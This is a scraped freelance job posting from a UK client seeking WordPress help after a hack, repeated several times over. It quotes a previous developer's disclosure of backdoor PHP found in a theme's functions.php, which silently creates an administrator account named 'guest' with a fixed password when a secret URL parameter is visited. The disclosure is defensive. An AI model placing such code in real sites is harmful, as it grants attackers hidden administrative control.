Wordpress Web Maintenance
- or -
Post a project like this2403
$$$
- Posted:
- Proposals: 23
- Remote
- #1711183
- Awarded
24/7 Expert WordPress, Shopify, Wix, Squarespace, Magento, Drupal, SEO, Joomla, Developer & Designer | Photoshop & Illustrator Master
London
WordPress | PHP | MediaWiki | Shopify | SEO & Social Media Consultant | Search & Analytics Expert
Stockholm
18174781229297179058516109031571929142545214226571418100141118813886891368518
Description
Experience Level: Expert
General information for the website: Wordpress web maintenance
Description of requirements/features: We have 3 current issues.
1) We were recently hacked. This has now been resolved but at the moment it still shows in google that the site may have been hacked. It may be that this has to work its way down the search results as it is displaying correctly on the google page on the right. This needs to be looked at please.
2) We have a website job post integration with broadbean and at the moment the website is not sending a success messages to Broadbean when the advert is live on the site. Broadbean can communicate with you on this.
3) A previous developer who worked on the site wrote the below:
Obviously during my investigation I was looking through the files in your site to try and find things that may be effecting the functionality. Although I did not find anything for this issue, I do feel a duty of responsibility to inform you of a function I found. This was found in the urn theme functions.php file. The code is below for reference.
add_action( 'wp_head', 'my_back' );
function my_back() {
if ( $_GET['back'] == '0x6v0042' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'guest', '0x6v0042' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
This is a big problem as what that code does is provide a “backdoor” into WordPress so that anyone visiting the special link it creates can create themselves and Administrator user account in WordPress. You may be able to spot that it creates a user named “guest”. This guest user was in the users list in the WordPress admin and therefore it would appear that your site has been compromised in some way by someone.
A quick search on the internet found this page:
https://www.wpcrafter.com/create-secret-backdoor-admin-access-wordpress/
Clearly someone has used this page to learn how to do this and add the code to the site. I have removed the code for now and changed the password on the guest user - you could delete this too if you like.
Please let me know what you can help with?
Thanks
Uche
Extra notes: We have 3 current issues.
1) We were recently hacked. This has now been resolved but at the moment it still shows in google that the site may have been hacked. It may be that this has to work its way down the search results as it is displaying correctly on the google page on the right. This needs to be looked at please.
2) We have a website job post integration with broadbean and at the moment the website is not sending a success messages to Broadbean when the advert is live on the site. Broadbean can communicate with you on this.
3) A previous developer who worked on the site wrote the below:
Obviously during my investigation I was looking through the files in your site to try and find things that may be effecting the functionality. Although I did not find anything for this issue, I do feel a duty of responsibility to inform you of a function I found. This was found in the urn theme functions.php file. The code is below for reference.
add_action( 'wp_head', 'my_back' );
function my_back() {
if ( $_GET['back'] == '0x6v0042' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'guest', '0x6v0042' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
This is a big problem as what that code does is provide a “backdoor” into WordPress so that anyone visiting the special link it creates can create themselves and Administrator user account in WordPress. You may be able to spot that it creates a user named “guest”. This guest user was in the users list in the WordPress admin and therefore it would appear that your site has been compromised in some way by someone.
A quick search on the internet found this page:
https://www.wpcrafter.com/create-secret-backdoor-admin-access-wordpress/
Clearly someone has used this page to learn how to do this and add the code to the site. I have removed the code for now and changed the password on the guest user - you could delete this too if you like.
Please let me know what you can help with?
Thanks
Uche
Description of requirements/features: We have 3 current issues.
1) We were recently hacked. This has now been resolved but at the moment it still shows in google that the site may have been hacked. It may be that this has to work its way down the search results as it is displaying correctly on the google page on the right. This needs to be looked at please.
2) We have a website job post integration with broadbean and at the moment the website is not sending a success messages to Broadbean when the advert is live on the site. Broadbean can communicate with you on this.
3) A previous developer who worked on the site wrote the below:
Obviously during my investigation I was looking through the files in your site to try and find things that may be effecting the functionality. Although I did not find anything for this issue, I do feel a duty of responsibility to inform you of a function I found. This was found in the urn theme functions.php file. The code is below for reference.
add_action( 'wp_head', 'my_back' );
function my_back() {
if ( $_GET['back'] == '0x6v0042' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'guest', '0x6v0042' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
This is a big problem as what that code does is provide a “backdoor” into WordPress so that anyone visiting the special link it creates can create themselves and Administrator user account in WordPress. You may be able to spot that it creates a user named “guest”. This guest user was in the users list in the WordPress admin and therefore it would appear that your site has been compromised in some way by someone.
A quick search on the internet found this page:
https://www.wpcrafter.com/create-secret-backdoor-admin-access-wordpress/
Clearly someone has used this page to learn how to do this and add the code to the site. I have removed the code for now and changed the password on the guest user - you could delete this too if you like.
Please let me know what you can help with?
Thanks
Uche
Extra notes: We have 3 current issues.
1) We were recently hacked. This has now been resolved but at the moment it still shows in google that the site may have been hacked. It may be that this has to work its way down the search results as it is displaying correctly on the google page on the right. This needs to be looked at please.
2) We have a website job post integration with broadbean and at the moment the website is not sending a success messages to Broadbean when the advert is live on the site. Broadbean can communicate with you on this.
3) A previous developer who worked on the site wrote the below:
Obviously during my investigation I was looking through the files in your site to try and find things that may be effecting the functionality. Although I did not find anything for this issue, I do feel a duty of responsibility to inform you of a function I found. This was found in the urn theme functions.php file. The code is below for reference.
add_action( 'wp_head', 'my_back' );
function my_back() {
if ( $_GET['back'] == '0x6v0042' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'guest', '0x6v0042' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
This is a big problem as what that code does is provide a “backdoor” into WordPress so that anyone visiting the special link it creates can create themselves and Administrator user account in WordPress. You may be able to spot that it creates a user named “guest”. This guest user was in the users list in the WordPress admin and therefore it would appear that your site has been compromised in some way by someone.
A quick search on the internet found this page:
https://www.wpcrafter.com/create-secret-backdoor-admin-access-wordpress/
Clearly someone has used this page to learn how to do this and add the code to the site. I have removed the code for now and changed the password on the guest user - you could delete this too if you like.
Please let me know what you can help with?
Thanks
Uche
Uche M.
97% (26)Projects Completed
31
Freelancers worked with
30
Projects awarded
17%
Last project
26 Nov 2021
United Kingdom
New Proposal
Login to your account and send a proposal now to get this project.
Log inClarification Board Ask a Question
-
I can complete this job in just 12 hours (Task 1 & 3).
-
Can you please provide to me link from your site? Without that is very hard to give a quote.
-
Uche
Only task 2 is clear cut, can i quote for task 2 only for now and later for task 1 & 3? -
Uche
Do you have a timeline? -
Hi Uche
Is there any deadline? As I need more than 24 hours to solve these issues. -
Hi Uche. I have just responded to you
501197500950500913500912500892500865
We collect cookies to enable the proper functioning and security of our website, and to enhance your experience. By clicking on 'Accept All Cookies', you consent to the use of these cookies. You can change your 'Cookies Settings' at any time. For more information, please read ourCookie Policy
Cookie Settings
Accept All Cookies